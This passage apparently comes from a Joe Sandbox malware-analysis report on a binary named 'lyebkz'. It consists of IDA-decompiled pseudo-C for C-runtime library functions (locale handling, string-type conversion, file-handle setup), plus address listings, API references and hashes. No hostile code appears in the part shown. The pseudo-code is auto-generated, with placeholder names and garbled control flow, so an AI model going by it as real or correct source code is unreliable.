					_t32 =  *0x41a888; // 0x41a7b0
					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
				}
				E00408141( *((intOrPtr*)(_t45 + 0x6c)));
				 *(_t46 - 4) = 0xfffffffe;
				return E00402959(E004044A2());
			}








                                    0x004043c4
                                    0x004043c4
                                    0x004043c6
                                    0x004043cb
                                    0x004043d0
                                    0x004043d6
                                    0x004043de
                                    0x004043e1
                                    0x004043e6
                                    0x004043e7
                                    0x004043ea
                                    0x004043ed
                                    0x004043f7
                                    0x004043fc
                                    0x00404404
                                    0x0040440c
                                    0x0040441c
                                    0x0040441c
                                    0x00404422
                                    0x00404425
                                    0x0040442c
                                    0x00404433
                                    0x0040443c
                                    0x00404442
                                    0x00404449
                                    0x0040444f
                                    0x00404456
                                    0x0040445d
                                    0x00404463
                                    0x00404466
                                    0x00404469
                                    0x0040446e
                                    0x00404470
                                    0x00404475
                                    0x00404475
                                    0x0040447b
                                    0x00404481
                                    0x00404492

                                    APIs
                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00417EA0,0000000C,004044FF,00000000,00000000,?,0040105F,00000000,0041A010), ref: 004043D6
                                    • __crt_waiting_on_module_handle.LIBCMT ref: 004043E1
                                      • Part of subcall function 00403697: Sleep.KERNEL32(000003E8,00000000,?,004042EA,KERNEL32.DLL,?,00404356,?,0040105F,00000000,0041A010), ref: 004036A3
                                      • Part of subcall function 00403697: GetModuleHandleW.KERNEL32(00000000,?,004042EA,KERNEL32.DLL,?,00404356,?,0040105F,00000000,0041A010), ref: 004036AC
                                    • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040440A
                                    • GetProcAddress.KERNEL32(004168C0,DecodePointer), ref: 0040441A
                                    • __lock.LIBCMT ref: 0040443C
                                    • InterlockedIncrement.KERNEL32(?), ref: 00404449
                                    • __lock.LIBCMT ref: 0040445D
                                    • ___addlocaleref.LIBCMT ref: 0040447B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                    • API String ID: 1028249917-2843748187
                                    • Opcode ID: 54f8c5f34c6bc7c2a3e49864ca8e759d4096070db0e67bcf254367c69a69e8c6
                                    • Instruction ID: 5dc6d82e2b71dba88b872a7ef428a14285a9906b103dfc0ef3a0970a5e0c1c52
                                    • Opcode Fuzzy Hash: 54f8c5f34c6bc7c2a3e49864ca8e759d4096070db0e67bcf254367c69a69e8c6
                                    • Instruction Fuzzy Hash: 77119DB0941701EBD720AF26D905B9ABBE4AF44318F10842FE499A72E1CB78DA41CB18
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00411FDA Relevance: 16.7, APIs: 11, Instructions: 166COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 88%
                                    			E00411FDA(intOrPtr* __ecx, void* __edx, int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				short _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t44;
				intOrPtr _t46;
				void* _t47;
				short _t49;
				int _t63;
				short* _t67;
				long _t73;
				short* _t75;
				void* _t76;
				void* _t85;
				intOrPtr* _t87;
				short _t88;
				void* _t89;
				int _t90;
				char* _t92;
				void* _t93;
				signed int _t97;
				short* _t98;
				void* _t106;

				_t85 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t44 =  *0x41a550; // 0xdbec4c0
				_v8 = _t44 ^ _t97;
				_t46 =  *0x41ba94; // 0x1
				_t75 = 0;
				_t87 = __ecx;
				if(_t46 != 0) {
					L6:
					__eflags = _t46 - 2;
					if(_t46 == 2) {
						L25:
						_t92 = 0;
						__eflags = _a24 - _t75;
						if(_a24 == _t75) {
							_a24 =  *((intOrPtr*)( *_t87 + 0x14));
						}
						__eflags = _a20 - _t75;
						if(_a20 == _t75) {
							_a20 =  *((intOrPtr*)( *_t87 + 4));
						}
						_t47 = E00413CDB(_t75, _t85, _t87, _t92, _a24);
						__eflags = _t47 - 0xffffffff;
						if(_t47 != 0xffffffff) {
							__eflags = _t47 - _a20;
							if(_t47 == _a20) {
								L34:
								_t88 = GetStringTypeA(_a24, _a4, _a8, _a12, _a16);
								__eflags = _t92 - _t75;
								if(__eflags != 0) {
									_push(_t92);
									E00404A01(_t75, _t88, _t92, __eflags);
								}
								_t49 = _t88;
								goto L37;
							}
							_t92 = E00413D24(_t85, _a20, _t47, _a8,  &_a12, _t75, _t75);
							__eflags = _t92 - _t75;
							if(_t92 == _t75) {
								goto L30;
							}
							_a8 = _t92;
							goto L34;
						} else {
							L30:
							_t49 = 0;
							L37:
							_pop(_t89);
							_pop(_t93);
							_pop(_t76);
							return E004057A2(_t49, _t76, _v8 ^ _t97, _t85, _t89, _t93);
						}
					}
					__eflags = _t46 - _t75;
					if(_t46 == _t75) {
						goto L25;
					}
					__eflags = _t46 - 1;
					if(_t46 != 1) {
						goto L30;
					}
					L9:
					_v12 = _t75;
					if(_a20 == _t75) {
						_a20 =  *((intOrPtr*)( *_t87 + 4));
					}
					_t90 = MultiByteToWideChar(_a20, 1 + (0 | _a28 != _t75) * 8, _a8, _a12, _t75, _t75);
					_t106 = _t90 - _t75;
					if(_t106 == 0) {
						goto L30;
					} else {
						if(_t106 <= 0 || _t90 > 0x7ffffff0) {
							L21:
							if(_t75 == 0) {
								goto L30;
							}
							E00402400(_t90, _t75, 0, _t90 + _t90);
							_t63 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t75, _t90);
							if(_t63 != 0) {
								_v12 = GetStringTypeW(_a4, _t75, _t63, _a16);
							}
							E0040C887(_t75);
							_t49 = _v12;
							goto L37;
						} else {
							_t16 = _t90 + 8; // 0x8
							_t66 = _t90 + _t16;
							if(_t90 + _t16 > 0x400) {
								_t67 = E0040AA9E(_t75, _t85, _t90, _t66);
								__eflags = _t67 - _t75;
								if(_t67 == _t75) {
									L20:
									_t75 = _t67;
									goto L21;
								}
								 *_t67 = 0xdddd;
								L19:
								_t67 =  &(_t67[4]);
								goto L20;
							}
							E00412D80(_t66);
							_t67 = _t98;
							if(_t67 == _t75) {
								goto L20;
							}
							 *_t67 = 0xcccc;
							goto L19;
						}
					}
				}
				if(GetStringTypeW(1, 0x417ca4, 1,  &_v12) == 0) {
					_t73 = GetLastError();
					__eflags = _t73 - 0x78;
					if(_t73 != 0x78) {
						_t46 =  *0x41ba94; // 0x1
					} else {
						_t46 = 2;
						 *0x41ba94 = _t46;
					}
					goto L6;
				}
				 *0x41ba94 = 1;
				goto L9;
			}





























                                    0x00411fda
                                    0x00411fdf
                                    0x00411fe0
                                    0x00411fe1
                                    0x00411fe8
                                    0x00411feb
                                    0x00411ff2
                                    0x00411ff5
                                    0x00411ff9
                                    0x00412035
                                    0x00412035
                                    0x00412038
                                    0x0041210d
                                    0x0041210d
                                    0x0041210f
                                    0x00412112
                                    0x00412119
                                    0x00412119
                                    0x0041211c
                                    0x0041211f
                                    0x00412126
                                    0x00412126
                                    0x0041212c
                                    0x00412132
                                    0x00412135
                                    0x0041213b
                                    0x0041213e
                                    0x0041215e
                                    0x00412173
                                    0x00412175
                                    0x00412177
                                    0x00412179
                                    0x0041217a
                                    0x0041217f
                                    0x00412180
                                    0x00000000
                                    0x00412180
                                    0x00412152
                                    0x00412157
                                    0x00412159
                                    0x00000000
                                    0x00000000
                                    0x0041215b
                                    0x00000000
                                    0x00412137
                                    0x00412137
                                    0x00412137
                                    0x00412182
                                    0x00412185
                                    0x00412186
                                    0x00412187
                                    0x00412193
                                    0x00412193
                                    0x00412135
                                    0x0041203e
                                    0x00412040
                                    0x00000000
                                    0x00000000
                                    0x00412046
                                    0x00412049
                                    0x00000000
                                    0x00000000
                                    0x0041204f
                                    0x0041204f
                                    0x00412055
                                    0x0041205c
                                    0x0041205c
                                    0x00412082
                                    0x00412084
                                    0x00412086
                                    0x00000000
                                    0x0041208c
                                    0x0041208c
                                    0x004120ca
                                    0x004120cc
                                    0x00000000
                                    0x00000000
                                    0x004120d5
                                    0x004120ea
                                    0x004120ee
                                    0x004120fe
                                    0x004120fe
                                    0x00412102
                                    0x00412107
                                    0x00000000
                                    0x00412096
                                    0x00412096
                                    0x00412096
                                    0x0041209f
                                    0x004120b5
                                    0x004120bb
                                    0x004120bd
                                    0x004120c8
                                    0x004120c8
                                    0x00000000
                                    0x004120c8
                                    0x004120bf
                                    0x004120c5
                                    0x004120c5
                                    0x00000000
                                    0x004120c5
                                    0x004120a1
                                    0x004120a6
                                    0x004120aa
                                    0x00000000
                                    0x00000000
                                    0x004120ac
                                    0x00000000
                                    0x004120ac
                                    0x0041208c
                                    0x00412086
                                    0x00412011
                                    0x0041201b
                                    0x00412021
                                    0x00412024
                                    0x00412030
                                    0x00412026
                                    0x00412028
                                    0x00412029
                                    0x00412029
                                    0x00000000
                                    0x00412024
                                    0x00412013
                                    0x00000000

                                    APIs
                                    • GetStringTypeW.KERNEL32(00000001,00417CA4,00000001,?,0041B6FC,?,00000000,?,?,?,004121C4,00000001,?,00407AC0,?,?), ref: 00412009
                                    • GetLastError.KERNEL32(?,004121C4,00000001,?,00407AC0,?,?,?,?,00407AC0,?,00000001,00407AC0,00000000,?,0040C398), ref: 0041201B
                                    • MultiByteToWideChar.KERNEL32(00407AC0,00000000,?,?,00000000,00000000,0041B6FC,?,00000000,?,?,?,004121C4,00000001,?,00407AC0), ref: 00412080
                                    • _malloc.LIBCMT ref: 004120B5
                                    • _memset.LIBCMT ref: 004120D5
                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,00407AC0,?,00000001,00407AC0,00000000,?,0040C398,00407AC0), ref: 004120EA
                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,0040C398,00407AC0,00000004), ref: 004120F8
                                    • __freea.LIBCMT ref: 00412102
                                    • ___ansicp.LIBCMT ref: 0041212C
                                    • ___convertcp.LIBCMT ref: 0041214D
                                      • Part of subcall function 00413D24: GetCPInfo.KERNEL32(?,00407AC0,?,00000000,00000000,00000000,?,?,?,004121C4,00000001,?,00407AC0,?,?,?), ref: 00413D6F
                                      • Part of subcall function 00413D24: GetCPInfo.KERNEL32(?,00000001,?,004121C4,00000001,?), ref: 00413D88
                                      • Part of subcall function 00413D24: _strlen.LIBCMT ref: 00413DA6
                                      • Part of subcall function 00413D24: _memset.LIBCMT ref: 00413E1E
                                      • Part of subcall function 00413D24: MultiByteToWideChar.KERNEL32(?,00000001,?,004121C4,?,00000000,?,?,?,?,?,?,?,004121C4,00000001,?), ref: 00413E35
                                      • Part of subcall function 00413D24: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,004121C4), ref: 00413E50
                                    • GetStringTypeA.KERNEL32(?,?,?,?,?,0041B6FC,?,00000000,?,?,?,004121C4,00000001,?,00407AC0,?), ref: 0041216D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$StringType$Info_memset$ErrorLast___ansicp___convertcp__freea_malloc_strlen
                                    • String ID:
                                    • API String ID: 820197566-0
                                    • Opcode ID: 4b9bb585d2886f32a873212233d828604252602904f23578ee577a434fc68a06
                                    • Instruction ID: bd1df50b8750e82d9b32b6600c83140f90e30ba0ec0409431a651977953664f9
                                    • Opcode Fuzzy Hash: 4b9bb585d2886f32a873212233d828604252602904f23578ee577a434fc68a06
                                    • Instruction Fuzzy Hash: C451AC7150010ABFDB20DFA4DE819EF3FA9EB08364B10412AFA04D7250D779CDA1DBA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00409025 Relevance: 15.1, APIs: 10, Instructions: 95COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 83%
                                    			E00409025(void* __ebx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t13;
				intOrPtr _t14;
				intOrPtr _t17;
				void* _t43;
				intOrPtr* _t51;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t51 = E00404CAD(8, 1);
					_t57 = _t51;
					if(_t51 != 0) {
						_t13 = E00404CAD(0xd8, 1);
						 *_t51 = _t13;
						__eflags = _t13;
						if(__eflags != 0) {
							_t14 = E00404CAD(0x220, 1);
							 *((intOrPtr*)(_t51 + 4)) = _t14;
							__eflags = _t14;
							if(__eflags != 0) {
								E00408269( *_t51, 0x41a7b0);
								_t48 =  *_t51;
								_t17 = E00408E0A(_a8,  *_t51, _a4);
								_pop(_t43);
								__eflags = _t17;
								if(__eflags != 0) {
									__eflags = E004095DB(_t43, _t48, __eflags,  *((intOrPtr*)( *_t51 + 4)),  *((intOrPtr*)(_t51 + 4)));
									if(__eflags == 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) = 1;
										 *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) = 1;
										L17:
										return _t51;
									}
									_push( *((intOrPtr*)(_t51 + 4)));
									E00404A01(__ebx, 1, _t51, __eflags);
									E004081D0( *_t51);
									E00407FF8( *_t51);
									_push(_t51);
									E00404A01(__ebx, 1, _t51, __eflags);
									L15:
									_t51 = 0;
									goto L17;
								}
								E004081D0( *_t51);
								E00407FF8( *_t51);
								_push(_t51);
								E00404A01(__ebx, 1, _t51, __eflags);
								goto L15;
							}
							_push( *_t51);
							E00404A01(__ebx, 1, _t51, __eflags);
							_push(_t51);
							E00404A01(__ebx, 1, _t51, __eflags);
							L8:
							goto L3;
						}
						_push(_t51);
						E00404A01(__ebx, 1, _t51, __eflags);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E00402673(_t57))) = 0xc;
					goto L4;
				}
			}











                                    0x00409030
                                    0x00409056
                                    0x00000000
                                    0x00409038
                                    0x00409043
                                    0x00409047
                                    0x00409049
                                    0x00409062
                                    0x00409069
                                    0x0040906b
                                    0x0040906d
                                    0x0040907e
                                    0x00409085
                                    0x00409088
                                    0x0040908a
                                    0x004090a3
                                    0x004090ae
                                    0x004090b0
                                    0x004090b5
                                    0x004090b6
                                    0x004090b8
                                    0x004090e2
                                    0x004090e4
                                    0x0040910c
                                    0x00409111
                                    0x00409113
                                    0x00000000
                                    0x00409113
                                    0x004090e6
                                    0x004090e9
                                    0x004090f0
                                    0x004090f7
                                    0x004090fc
                                    0x004090fd
                                    0x00409105
                                    0x00409105
                                    0x00000000
                                    0x00409105
                                    0x004090bc
                                    0x004090c3
                                    0x004090c8
                                    0x004090c9
                                    0x00000000
                                    0x004090ce
                                    0x0040908c
                                    0x0040908e
                                    0x00409093
                                    0x00409094
                                    0x00409075
                                    0x00000000
                                    0x00409075
                                    0x0040906f
                                    0x00409070
                                    0x00000000
                                    0x00409070
                                    0x0040904b
                                    0x00409050
                                    0x00000000
                                    0x00409050

                                    APIs
                                    • __calloc_crt.LIBCMT ref: 0040903E
                                      • Part of subcall function 00404CAD: __calloc_impl.LIBCMT ref: 00404CBE
                                      • Part of subcall function 00404CAD: Sleep.KERNEL32(00000000,0040105F,00000000,0041A010), ref: 00404CD5
                                    • __calloc_crt.LIBCMT ref: 00409062
                                    • __calloc_crt.LIBCMT ref: 0040907E
                                    • __copytlocinfo_nolock.LIBCMT ref: 004090A3
                                    • __setlocale_nolock.LIBCMT ref: 004090B0
                                    • ___removelocaleref.LIBCMT ref: 004090BC
                                    • ___freetlocinfo.LIBCMT ref: 004090C3
                                    • __setmbcp_nolock.LIBCMT ref: 004090DB
                                    • ___removelocaleref.LIBCMT ref: 004090F0
                                    • ___freetlocinfo.LIBCMT ref: 004090F7
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: __calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                    • String ID:
                                    • API String ID: 2969281212-0
                                    • Opcode ID: bc8690fa15a16c220bb2db8f816911939f4b60b98934a6ab41b89ce9f17e67aa
                                    • Instruction ID: bfec1423fcc47b187c3acc600d0bd4830a93816b71d59a5ef7fa1ff85f506ca0
                                    • Opcode Fuzzy Hash: bc8690fa15a16c220bb2db8f816911939f4b60b98934a6ab41b89ce9f17e67aa
                                    • Instruction Fuzzy Hash: 4921F675248601AAEB217F26D80294B77E1DF81758B21403FF484766D2EE3F9C119A5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004084CD Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 91%
                                    			E004084CD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				void* _t35;
				intOrPtr* _t37;
				void* _t38;
				void* _t39;

				_t39 = __eflags;
				_t27 = __ebx;
				_push(0xc);
				_push(0x4181c0);
				E00402914(__ebx, __edi, __esi);
				_t35 = E00404524(__ebx, __edx, __edi, _t39);
				_t37 = E00404CAD(8, 1);
				 *((intOrPtr*)(_t38 - 0x1c)) = _t37;
				_t40 = _t37;
				if(_t37 != 0) {
					E004082CD(__ebx, __edx, _t35, _t37, __eflags);
					E004094BB(__ebx, __edx, _t35, _t37, __eflags);
					 *_t37 =  *((intOrPtr*)(_t35 + 0x6c));
					 *(_t37 + 4) =  *(_t35 + 0x68);
					E004059E4(_t27, 0xc);
					_t5 = _t38 - 4;
					 *_t5 =  *(_t38 - 4) & 0x00000000;
					__eflags =  *_t5;
					E00408141( *_t37);
					 *(_t38 - 4) = 0xfffffffe;
					E00408567();
					E004059E4(_t27, 0xd);
					 *(_t38 - 4) = 1;
					InterlockedIncrement( *(_t37 + 4));
					 *(_t38 - 4) = 0xfffffffe;
					E00408573();
					_t24 = _t37;
				} else {
					 *((intOrPtr*)(E00402673(_t40))) = 0xc;
					_t24 = 0;
				}
				return E00402959(_t24);
			}








                                    0x004084cd
                                    0x004084cd
                                    0x004084cd
                                    0x004084cf
                                    0x004084d4
                                    0x004084de
                                    0x004084eb
                                    0x004084ed
                                    0x004084f0
                                    0x004084f2
                                    0x00408503
                                    0x00408508
                                    0x00408510
                                    0x00408515
                                    0x0040851a
                                    0x00408520
                                    0x00408520
                                    0x00408520
                                    0x00408526
                                    0x0040852c
                                    0x00408533
                                    0x0040853a
                                    0x00408540
                                    0x0040854a
                                    0x00408550
                                    0x00408557
                                    0x0040855c
                                    0x004084f4
                                    0x004084f9
                                    0x004084ff
                                    0x004084ff
                                    0x00408563

                                    APIs
                                    • __getptd.LIBCMT ref: 004084D9
                                      • Part of subcall function 00404524: __getptd_noexit.LIBCMT ref: 00404527
                                      • Part of subcall function 00404524: __amsg_exit.LIBCMT ref: 00404534
                                    • __calloc_crt.LIBCMT ref: 004084E4
                                      • Part of subcall function 00404CAD: __calloc_impl.LIBCMT ref: 00404CBE
                                      • Part of subcall function 00404CAD: Sleep.KERNEL32(00000000,0040105F,00000000,0041A010), ref: 00404CD5
                                    • __lock.LIBCMT ref: 0040851A
                                    • ___addlocaleref.LIBCMT ref: 00408526
                                    • __lock.LIBCMT ref: 0040853A
                                    • InterlockedIncrement.KERNEL32(?), ref: 0040854A
                                      • Part of subcall function 00402673: __getptd_noexit.LIBCMT ref: 00402673
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__calloc_impl__getptd
                                    • String ID:
                                    • API String ID: 3538106438-0
                                    • Opcode ID: 621d3895829c6b49b9660ea63490fc0c05586413185529fdfcceef67b59ec367
                                    • Instruction ID: a2c7048e600bd7d3766a7fbaf316fb38f97334e219a7c11658b2c65c2179a7bc
                                    • Opcode Fuzzy Hash: 621d3895829c6b49b9660ea63490fc0c05586413185529fdfcceef67b59ec367
                                    • Instruction Fuzzy Hash: A8019271600701EBEB10BF759A03B5D76A0AF04728F20412FF4947A2C1CF7C49419B5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405178 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 95%
                                    			E00405178(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t27;
				signed int _t34;
				signed int _t36;
				signed char _t42;
				intOrPtr* _t46;
				void* _t49;
				signed int _t56;
				void* _t57;

				_t55 = __esi;
				_t49 = __edx;
				_push(0xc);
				_push(0x417f78);
				E00402914(__ebx, __edi, __esi);
				 *(_t57 - 0x1c) = 0;
				_t42 = 0;
				if(( *(_t57 + 0xc) & 0x00000008) != 0) {
					_t42 = 0x20;
				}
				if(( *(_t57 + 0xc) & 0x00004000) != 0) {
					_t42 = _t42 | 0x00000080;
				}
				if(( *(_t57 + 0xc) & 0x00000080) != 0) {
					_t42 = _t42 | 0x00000010;
				}
				_t27 = GetFileType( *(_t57 + 8));
				if(_t27 != 0) {
					__eflags = _t27 - 2;
					if(__eflags != 0) {
						__eflags = _t27 - 3;
						if(__eflags == 0) {
							_t42 = _t42 | 0x00000008;
							__eflags = _t42;
						}
					} else {
						_t42 = _t42 | 0x00000040;
					}
					_t56 = E00404FDE(_t42, _t49, 0, _t55, __eflags);
					 *(_t57 + 0xc) = _t56;
					__eflags = _t56 - 0xffffffff;
					if(__eflags != 0) {
						 *((intOrPtr*)(_t57 - 4)) = 0;
						E00404D99(_t42, _t56,  *(_t57 + 8));
						_t46 = 0x41bbc0 + (_t56 >> 5) * 4;
						_t34 = (_t56 & 0x0000001f) << 6;
						 *( *_t46 + _t34 + 4) = _t42 | 0x00000001;
						 *( *_t46 + _t34 + 0x24) =  *( *_t46 + _t34 + 0x24) & 0x00000080;
						 *( *_t46 + _t34 + 0x24) =  *( *_t46 + _t34 + 0x24) & 0x0000007f;
						 *(_t57 - 0x1c) = 1;
						 *((intOrPtr*)(_t57 - 4)) = 0xfffffffe;
						_t36 = E00405266(0, _t56);
						__eflags =  *(_t57 - 0x1c);
						if( *(_t57 - 0x1c) == 0) {
							goto L8;
						}
						_t37 = _t56;
						goto L9;
					} else {
						 *((intOrPtr*)(E00402673(__eflags))) = 0x18;
						_t36 = E00402686(__eflags);
						 *_t36 = 0;
						goto L8;
					}
				} else {
					_t36 = E00402699(GetLastError());
					L8:
					_t37 = _t36 | 0xffffffff;
					L9:
					return E00402959(_t37);
				}
			}











                                    0x00405178
                                    0x00405178
                                    0x00405178
                                    0x0040517a
                                    0x0040517f
                                    0x00405186
                                    0x00405189
                                    0x0040518f
                                    0x00405191
                                    0x00405191
                                    0x0040519b
                                    0x0040519d
                                    0x0040519d
                                    0x004051a4
                                    0x004051a6
                                    0x004051a6
                                    0x004051ac
                                    0x004051b4
                                    0x004051cc
                                    0x004051cf
                                    0x004051d6
                                    0x004051d9
                                    0x004051db
                                    0x004051db
                                    0x004051db
                                    0x004051d1
                                    0x004051d1
                                    0x004051d1
                                    0x004051e3
                                    0x004051e5
                                    0x004051e8
                                    0x004051eb
                                    0x00405201
                                    0x00405208
                                    0x00405217
                                    0x00405223
                                    0x00405228
                                    0x00405232
                                    0x0040523b
                                    0x0040523e
                                    0x00405245
                                    0x0040524c
                                    0x00405251
                                    0x00405254
                                    0x00000000
                                    0x00000000
                                    0x0040525a
                                    0x00000000
                                    0x004051ed
                                    0x004051f2
                                    0x004051f8
                                    0x004051fd
                                    0x00000000
                                    0x004051fd
                                    0x004051b6
                                    0x004051bd
                                    0x004051c3
                                    0x004051c3
                                    0x004051c6
                                    0x004051cb
                                    0x004051cb

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                                    • String ID:
                                    • API String ID: 43408053-0
                                    • Opcode ID: 0849e630680a8a8b1b76160acefc4f8f547cdbce931b3e615ff009b2e92f6743
                                    • Instruction ID: 417f7844ae46f1e082a465723f9af685301617e363a653f1250fb5d41905576e
                                    • Opcode Fuzzy Hash: 0849e630680a8a8b1b76160acefc4f8f547cdbce931b3e615ff009b2e92f6743
                                    • Instruction Fuzzy Hash: 74213670901A059ADB119B35C80579A7F60EF42328F28876AE460AF2E3C77D8942DF8C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004084C2 Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 85%
                                    			E004084C2(void* __ebx, void* __edi, void* __esi, void* __eflags, LONG** _a4) {
				signed int _v8;
				void* _t10;
				LONG* _t13;
				LONG* _t18;
				LONG* _t22;
				LONG** _t33;

				_t31 = __edi;
				_t24 = __ebx;
				_push(8);
				_push(0x418198);
				_t10 = E00402914(__ebx, __edi, __esi);
				_t33 = _a4;
				if(_t33 != 0) {
					E004059E4(__ebx, 0xd);
					_v8 = _v8 & 0x00000000;
					_t13 = _t33[1];
					if(_t13 != 0 && InterlockedDecrement(_t13) == 0) {
						_t22 = _t33[1];
						_t42 = _t22 - 0x41a898;
						if(_t22 != 0x41a898) {
							_push(_t22);
							E00404A01(_t24, __edi, _t33, _t42);
						}
					}
					_v8 = 0xfffffffe;
					E004084AD();
					if( *_t33 != 0) {
						E004059E4(_t24, 0xc);
						_v8 = 1;
						E004081D0( *_t33);
						_t18 =  *_t33;
						if(_t18 != 0 &&  *_t18 == 0) {
							_t46 = _t18 - 0x41a7b0;
							if(_t18 != 0x41a7b0) {
								E00407FF8(_t18);
							}
						}
						_v8 = 0xfffffffe;
						E004084B9();
					}
					 *_t33 = 0xbaadf00d;
					_t33[1] = 0xbaadf00d;
					_push(_t33);
					_t10 = E00404A01(_t24, _t31, _t33, _t46);
				}
				return E00402959(_t10);
			}









                                    0x004084c2
                                    0x004084c2
                                    0x00408400
                                    0x00408402
                                    0x00408407
                                    0x0040840c
                                    0x00408411
                                    0x00408419
                                    0x0040841f
                                    0x00408423
                                    0x00408428
                                    0x00408435
                                    0x00408438
                                    0x0040843d
                                    0x0040843f
                                    0x00408440
                                    0x00408445
                                    0x0040843d
                                    0x00408446
                                    0x0040844d
                                    0x00408455
                                    0x00408459
                                    0x0040845f
                                    0x00408468
                                    0x0040846e
                                    0x00408472
                                    0x00408479
                                    0x0040847e
                                    0x00408481
                                    0x00408486
                                    0x0040847e
                                    0x00408487
                                    0x0040848e
                                    0x0040848e
                                    0x00408498
                                    0x0040849a
                                    0x0040849d
                                    0x0040849e
                                    0x004084a3
                                    0x004084a9

                                    APIs
                                    • __lock.LIBCMT ref: 00408419
                                      • Part of subcall function 004059E4: __mtinitlocknum.LIBCMT ref: 004059FA
                                      • Part of subcall function 004059E4: __amsg_exit.LIBCMT ref: 00405A06
                                      • Part of subcall function 004059E4: EnterCriticalSection.KERNEL32(00401050,00401050,?,0040ABE9,00000004,00418280,0000000C,00404CC3,00000000,0040105F,00000000,00000000,00000000,?,004044D6,00000001), ref: 00405A0E
                                    • InterlockedDecrement.KERNEL32(00000000), ref: 0040842B
                                      • Part of subcall function 00404A01: __lock.LIBCMT ref: 00404A1F
